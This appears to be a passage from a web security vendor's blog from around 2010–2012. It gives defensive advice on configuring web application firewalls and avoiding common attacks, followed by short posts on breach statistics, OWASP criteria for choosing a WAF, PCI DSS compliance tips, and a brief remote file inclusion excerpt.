How: A Defense in Depth strategy. This type of strategy aims to create a series of backup measures in case one layer fails, which allows each security tool to perform within its functional specifications and not put the entire job of security on one layer. This strategy can also be thought of as a funnel, with broader measures at the top leading down to the most specific security functionality at the base, in the form of a Web app firewall.

Firewall

Block traffic going to all ports other than Ports 80 and 443. This will funnel traffic into those two ports for inspection by the other layers of security behind it. Wendy Nather wrote a piece on why we still need firewalls that nicely explains their usefulness.

IDS

Detection is needed to alert a system admin if and when an intruder is recognized in the application. Being aware of an intruder’s existence inside the app allows for a potential attack to be identified before the attack has commenced. This will give a system admin time to take additional preventative measures to prevent an attack, such as blocking the IP or logging off a user account if its been taken over. This will provide a more general security detection solution that will alert when intrusions occur at the network and system levels, not specifically within an application, as an app firewall would.

IPS

An intrusion prevention system will prevent an attacker from gathering information on your app and sever. It’s essential to prevent hacker reconnaissance by obfuscating information like server type, file extensions, and application or site errors from being easily accessible to hackers. This is again a more system and network level approach.

Application firewall

Finally, your applications will require an app firewall to secure them specifically, as they are valuable centers of information with large amount of traffic going in and out. A Web app firewall can monitor, detect, and prevent malicious traffic accessing applications.  With active usage, a Web app firewall will act as a powerful last line of defense for your Web apps against attacks.

Shrink Wrap Your Security

Don’t: Expect a WAF to be correctly configured for your site out of the box.
Do: Set up your Web application firewall for your specific needs.
Why: Shrink-wrapping a Web app firewall’s security to tightly fit around your specific requirements leaves less room for error. Simply using a blacklist of attack signatures is a good way to get hit by a Zero Day, and whitelisting could lead to false-positives.
How: Set app specific policies that only allow an app to be used the way it was intended. Any vulnerabilities found through penetration testing that cannot be easily remediated should have app firewall policies put in place to protect until corrections can be made to the vulnerable code. Setting some of the below policies in your Web app firewall is a good start to shrink wrapping security.

Input validation.  Configuring a Web app firewall’s input validation policies will help prevent against attacks like SQL inject and cross site scripting (XSS).  Platform-specific exploits can use complex URL strings to gain access to a shell or a Common Gateway Interface (CGI), from which a hacker can easily get a directory listing revealing file structure. Input sanitizing prevents harmful scripts from being injected into your app through URLs or form fields and should be enabled on an app firewall. This should be configured depending on the characters permitted and needed in each individual field.

Use different configurations. Like customizing input sanitizing, if you need to secure – for example – an Exchange server and a Joomla site, do not use the same configuration for both. Just as a house with no windows will need different security than a glass house, different Web apps will have their own security needs that should be addressed independently.

Manage file uploads. If users can upload files, only allow the file types your site uses. This means things like preventing dynamic files from being uploaded if your site only hosts images. A Web app firewall should be configured to block any attempt to upload files that your app or site does not use. Be sure to be as specific as possible by either whitelisting only what you will use, or blacklisting all file types that you cannot use.

Be weary of session hijacking. Set user sessions to timeout when idle for an extended period of time. This will help prevent a user’s session from being hijacked, leading to unauthorized access to sensitive information. Policies can also be enforced so a session can only be used on a single IP address, thus preventing an outside hacker (with a different IP) from gaining access to the legitimate users session because it is limited to one IP.

Request management. You know the areas of your site or app where sensitive data can be accessed, the types of sensitive data, and the types of files that your site is composed of. Make sure access to admin URLs are restricted and requests for sensitive files are blocked by your Web app firewall for untrusted users.

Without security measures in place, hackers will find vulnerable penetration vectors in your Web applications. Imagine your site as a bank; there are ordinary locks and alarms on the perimeter doors, but the valuable goods (money, etc.) are inside a vault. Since you know your Web applications best, it’s up to you to make sure you place locks on all the doors, and make sure you put bigger locks on the more important doors. If you’re unsure what needs to be secured, thoroughly scrutinize and pentest your site.

 

You’re Never Done Securing

Even after you’ve configured your Web application firewall perfectly and put in place the best security policies you can, there are dangers to be aware of.  Human error, trust betrayal, and organizational challenges pose security threats that are hard to defend against, but are important to evaluate as they pertain to your organization.

Denial of Service (DoS). Made popular by its presence in the media as the attack method of choice by hacktivist groups, denial of service attacks (DoS) have become a major concern for many organizations – and rightly so. DoS attacks rely on a large number of requests to bring down a target site or app.  Casual DoS attacks can be diminished through use of a Web application firewall by limiting the number of requests per second or blocking IP addresses with high request frequencies. Though if you are dealing with very serious and determined DoS attacks, you may want to perform a risk assessment and investigate cloud-scale countermeasures, which will require some organizational backing to make the necessary changes.

Zero Day.  Zero Day attacks are attacks that exploit previously unknown vulnerabilities.  Even if you have tested against every known exploit and have secured against them, new vulnerability exploits will arise that you will not be protected against.  Any attack, even know attack types like SQL injection or cross site scripting, can become major threats if its a zero day exploit.  New exploits are created every day and can be very damaging, though a Web app firewall can be used to preempt them.   When purchasing a Web app firewall make sure it has a strategy for dealing with unknown exploits or a methodology for dealing with attacks that it hasn’t seen before.   Even with an app firewall in place, it’s important to remember that security today doesn’t mean you won’t be vulnerable tomorrow.

Exploiting Legitimate Trust Relationships.  Web app firewalls and security policies can go a long way to securing an organization, but exploitation of trust relationships – whether intentional or unintentional – are hard to defend against.  Members of an organization must be intelligent and prudent about their Web use for the organization to remain secure.  This means not opening attachments from unknown senders, not clicking on strange links from unknown and un-trusted people, and so on.  For example, if a user unknowingly downloads a keystroke logger from an untrusted email correspondant, a hacker can simply lift credentials from the logger and gain legitimate access to an organization’s system – no SQL injection, session hijacking, or complex hacking techniques required.  This example brings to light the human element of Web security; an organization is only as safe as its least secure link.

Test, Update, and Evaluate

Don’t: Have static security or perform one round of penetration testing, auditing, or use being PCI compliant as an excuse to not perform further testing.
Do: Test and audit regularly. Evolve your security plan as threats and traffic trends on your site change.
Why: Security vulnerabilities can arise after a code change, an update or through a new hacking method. Nothing is ever static; the Web is constantly changing, which means that security needs to stay current with changes that occur. New vulnerabilities are discovered all the time, even in major software companies’ code.
How: Stay current with patch and updates; people spend hours developing these for a reason. Stay informed by reading about information security trends, following #infosec on Twitter, talking to peers, and so on. Regularly pentest and audit your apps and sites. Analyze logs and learn from them to make adjustments to Web app firewall configuration.

Log. When first setting up a WAF, use a logging mode to evaluate your site’s traffic. This will give you a sense of where tighter policies may need to be set or where exceptions may need to be set.

Check for false positives. False positives are bad for business. You never want to blocking a legitimate and harmless user who accidentally mistyped a URL or input incorrect characters into a field because security policies are set too tightly. Logs should be checked regularly for errors that aren’t really errors, and exceptions should be added to policies that may be resulting in false positives.

Perform tests. Penetration testing for vulnerabilities in your code will show you what you need to protect against until new code can be deployed to fix it.  Set new policies in your app firewall based on your testing.

Update and patch.   Install updates as they are released.  Deploy patches to secure vulnerable code; it does’t matter if the patch is out if you don’t actually apply it.  If there is an update or patch available to secure a vulnerability, chances are there are people who know how to exploit it.

Web app firewalls can be a useful ally toward greater Web security for those who know how to use them properly.  Whether you’re in the market for a new Web app firewall, or are already a proud owner, understanding that a Web app firewall is a tool designed to be driven is an important step toward increased Web security.

No Comments »

2011 Web Security Statistics and How to Avoid Being a Victim in 2012

Posted: February 27th, 2012
Filed under: IIS & HTTP, Web and Application Security
Tags: , , , , , , ,


 

The More We Know, The Better We Can Prepare

The landscape of web security is constantly changing with hacking attacks growing more prevalent and diverse.Our job is to constantly be evaluating that ever-changing landscape so we can stay one step ahead and be prepared in the event of an attack.Here are some resources from around the web to keep you informed, prepared, and – most importantly – secure.

2011 Data Breach Investigations Report

2011 represented the all-time lowest amount of compromised data, but also the highest amount of incidents investigated ever.Among the highest hacking methods for 2011 were brute force and dictionary attacks, SQL Injection, and buffer overflow.Web applications were the most attacked pathway when hospitality and retail victims were removed from the data-set, and suffered more numerous attacks than ever.

Read the Report>

Web Application Firewalls can help protect your business from attack. Keeping harmful traffic out and letting good traffic in is crucial to running a business online,just as it is to running a brick-and-mortar business.With attacks evolving and becoming more and more prevalent, a blacklist of signatures is no longer enough to secure web apps.They need protection against threats both known and unknown.

Intrusion Detection FAQ>

Writing an Information Security Policy

An Information Security Policy is the cornerstone of an Information Security Program. It should reflect the organization’s objectives for security and the agreed upon management strategy for securing information.

In order to be useful in providing authority to execute the remainder of the Information Security Program, it must also be formally agreed upon by executive management. This means that, in order to compose an information security policy document, an organization has to have well-defined objectives for security and an agreed-upon management strategy for securing information.

How to Write an Information Security Policy>

Selecting a Web Application Firewall

OWASP, the authority on web security, recommends the following criteria for selecting your Web Application Firewall.

  • Protection Against OWASP Top Ten!
  • Very Few False Positives (i.e., should NEVER disallow an authorized request)
  • Strength of Default (Out of the Box) Defenses
  • Power and Ease of Learn Mode
  • Types of Vulnerabilities it can prevent.
  • Detects disclosure and unauthorized content in outbound reply messages, such as credit-card and Social Security numbers.
  • Both Positive and Negative Security model support.
  • Simplified and Intuitive User Interface.
  • Cluster mode support.
  • High Performance (milliseconds latency).
  • Complete Alerting, Forensics, Reporting capabilities.
  • Web ServicesXML support.
  • Brute Force protection.
  • Ability to Active (block and log), Passive (log only) and bypass the web trafic.
  • Ability to keep individual users constrained to exactly what they have seen in the current session
  • Ability to be configured to prevent ANY specific problem (i.e., Emergency Patches)
No Comments »

PCI DSS Compliance Matters

Posted: February 27th, 2012
Filed under: Around the Web, Web and Application Security
Tags: , , , , , ,


In 2011, 89% of organizations with payment card data loss were not Payment Card Industry Data Security Standard compliant at the time of the security breach.  These types of breaches can lead to monetary loss for the customer and for a company; in the case of the former, there is also the possibility of reputation loss – which may be a far worse and lasting negative effect.

Ten Ways to Avoid Costly PCI Compliance Violations

The first tip for avoiding costly PCI Compliance violations (in the above piece) is familiarization with the requirements themselves.  With the complexity and severity of security breaches always growing, it is crucial to know and understand the security standards required to store, transmit or process payment cardholder data.  While the 75 page PCI DSS “Requirements and Security Assessment Procedures” document may be somewhat daunting in its requests and exhaustive calls for  implementation, it can be simplified to:

  • Build and Maintain a Secure Network
  • Protect Cardholder Data
  • Maintain a Vulnerability Management Program
  • Implement Strong Access Control Measures
  • Regularly Monitor and Test Networks
  • Maintain an Information Security Policy

When you break down these main categories, there are 12 provisions to achieve PCI DSS compliance.   Not only are these requisite provisions for PCI Compliance, but they are a great template for security for any type of business.

Getting Started with the PCI Data Security Standard>>>

A while back we posted the following PCI quick tips, which are still applicable:

Do:

  • Encrypt cardholder data.
  • Use products that are approved for the PCI standard.
  • Understand the concept of compensating controls.
  • Organize PCI compliance as an on-going, cross-functional project–not as a one-time event.
  • Understand your cardholder information business process from end to end.
  • Take the time to read and understand the PCI Data Security Standard.

Don’t:

  • Store unnecessary cardholder data beyond receiving the authorization code.
  • Be lulled into thinking that you would not be a target for criminals.
  • Try to create your own crypto solutions.
  • Assume your vendor is protecting you.

Through all the preparation and planning, let’s not forget that PCI DSS does not make a company immune from attack.  It can and does still happen – after all, a determined hacker can bypass any security.  This is why PCI DSS Compliance, and security as a whole, must be treated as an ongoing processes with a time investment in-line with how much your company values staying in business.

 

No Comments »

Thoughts On Defensive Development for Sitecore

Posted: February 25th, 2012
Filed under: Web and Application Security
Tags: , , , , , , ,


Recently, Port80’s Joe Lima and Thomas Powell presented a talk on Web Application Security for Sitecore.  If you run Sitecore, you are a perfect candidate for ServerDefender VP!

The presentation can be viewed on Slideshare below.

 

Thoughts on Defensive Web Development - Sitecore

Thoughts on Defensive Web Development - Sitecore

No Comments »

All Your Web Sites Are Belong to Us

Posted: September 15th, 2010
Filed under: Web and Application Security


Remote File Inclusion: how the bad guys take control

Remote File Inclusion (RFI) is a type of vulnerability that allows an attacker to include a remote file, usually through a script, on the target Web server. RFI occurs due to the use of user supplied input without proper validation. This can lead to something as minimal as outputting the contents of the file, but depending on the severity, to list a few it can lead to: Read the rest of this entry »

No Comments »

Preparing for New PCI Standards

Posted: August 16th, 2010
Filed under: Web and Application Security
Tags: , , , , , ,


According to CSP Daily News the PCI Security Standards Council has just introduced the plan for Version 2.0 of its PCI standards which are due to take effect in October of 2010.

Version 2.0 of PCI DSS and PA-DSS do not introduce any new major requirements. Key updates, clarifications and guidance include: Read the rest of this entry »

No Comments »